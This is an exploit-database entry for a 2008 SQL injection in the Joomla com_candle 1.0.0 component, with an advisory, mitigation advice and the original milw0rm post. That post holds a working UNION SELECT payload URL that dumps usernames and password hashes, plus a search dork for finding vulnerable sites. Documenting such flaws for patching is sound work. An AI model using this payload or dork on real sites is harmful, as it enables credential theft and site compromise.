Vendor: Candle Component
Author: S@BUN
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Candle Component
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: YES
Related CWE: N/A
CPE: a:joomla:joomla
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

JOOMLA com_candle SQL Injection (cID)

A SQL injection vulnerability exists in version 1.0.0 of the Joomla com_candle component. The 'cID' parameter of the 'task=content' action in 'index.php' is used in a database query without being validated or escaped, so a remote, unauthenticated attacker can append arbitrary SQL to the query. The published proof of concept uses a UNION SELECT to read the username and password hash columns from the jos_users table; with database access of this kind an attacker can go on to compromise the site (for example by cracking or reusing administrator credentials).

Mitigation:

Upgrade to a fixed version of the Joomla com_candle component (a patch exists). Until then, treat cID as an integer: cast or validate it before it reaches any query, and check web server logs for requests to option=com_candle whose cID value is not a plain number.

Exploit-DB raw data:

#############################################
#
########### JOOMLA com_candle SQL Injection(cid)
#
#############################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
####
####MAiL : hackturkiye.hackturkiye@gmail.com
#
#############################################
#
##DORK 1 : allinurl:"com_candle"
#
#############################################
EXPLOIT :

index.php?option=com_candle&task=content&cID=-9999/**/union/**/select/**/0x3a,username,0x3a,password,0x3a,0x3a/**/from/**/jos_users/*

#############################################
################# S@BUN ####################
#############################################
######## hackturkiye.hackturkiye@gmail.com ######
#############################################

<mosinstall type="component" version="1.0.0">
	<name>Candle</name>
	<author>Son Vu</author>
	<creationDate>March 2007</creationDate>
	<copyright>(C) 2007 Open Source Matters. All rights reserved.</copyright>
	<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>

	<authorEmail>sora4g@gmail.com</authorEmail>
	<authorUrl></authorUrl>
	<version>1.0.0</version>
	<description>Candle Component.</description>

# milw0rm.com [2008-03-08]